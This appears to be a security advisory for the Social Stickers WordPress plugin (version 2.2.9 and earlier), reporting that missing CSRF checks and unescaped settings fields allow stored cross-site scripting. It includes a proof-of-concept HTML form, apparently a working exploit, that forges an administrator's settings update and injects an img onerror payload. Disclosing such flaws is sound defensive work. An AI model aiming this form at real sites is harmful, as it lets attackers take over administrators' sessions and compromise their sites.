WordPress Plugin Vulnerabilities
Social Stickers <= 2.2.9 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not have CSRF checks in place when updating its Social Network settings, and does not escape some of these fields, which could allow attackers to make a logged-in admin change them and lead to Stored Cross-Site Scripting issues.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wp-admin/options-general.php?page=social-
stickers%2Fsocial-stickers.php&tab=social_networks" method="POST">
<input type="hidden" name="aim" value="" />
<input type="hidden" name="behance"
value="hello "><img src=x onerror=alert(9
)>" />
<input type="hidden" name="bebo" value="" />
<input type="hidden" name="blogger" value="" />
<input type="hidden" name="delicious" value="" />
<input type="hidden" name="designfloat" value="" />
<input type="hidden" name="deviantart" value="" />
<input type="hidden" name="digg" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="flickr" value="" />
<input type="hidden" name="facebook" value="" />
<input type="hidden" name="googleplus" value="" />
<input type="hidden" name="lastfm" value="" />
<input type="hidden" name="linkedin" value="" />
<input type="hidden" name="myspace" value="" />
<input type="hidden" name="newsvine" value="" />
<input type="hidden" name="picasa" value="" />
<input type="hidden" name="posterous" value="" />
<input type="hidden" name="rss" value="" />
<input type="hidden" name="qik" value="" />
<input type="hidden" name="slashdot" value="" />
<input type="hidden" name="skype" value="" />
<input type="hidden" name="stumbleupon" value="" />
<input type="hidden" name="tumblr" value="" />
<input type="hidden" name="twitter" value="" />
<input type="hidden" name="vimeo" value="" />
<input type="hidden" name="youtube" value="" />
<input type="hidden" name="wordpress" value="" />
<input type="hidden" name="Submit" value="Update usernames" />
<input type="hidden" name="social-stickers-settings-submit" value="Y" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
Timeline
Publicly Published
2022-04-20 (about 2 months ago)
Added
2022-04-20 (about 2 months ago)
Last Updated
2022-04-21 (about 2 months ago)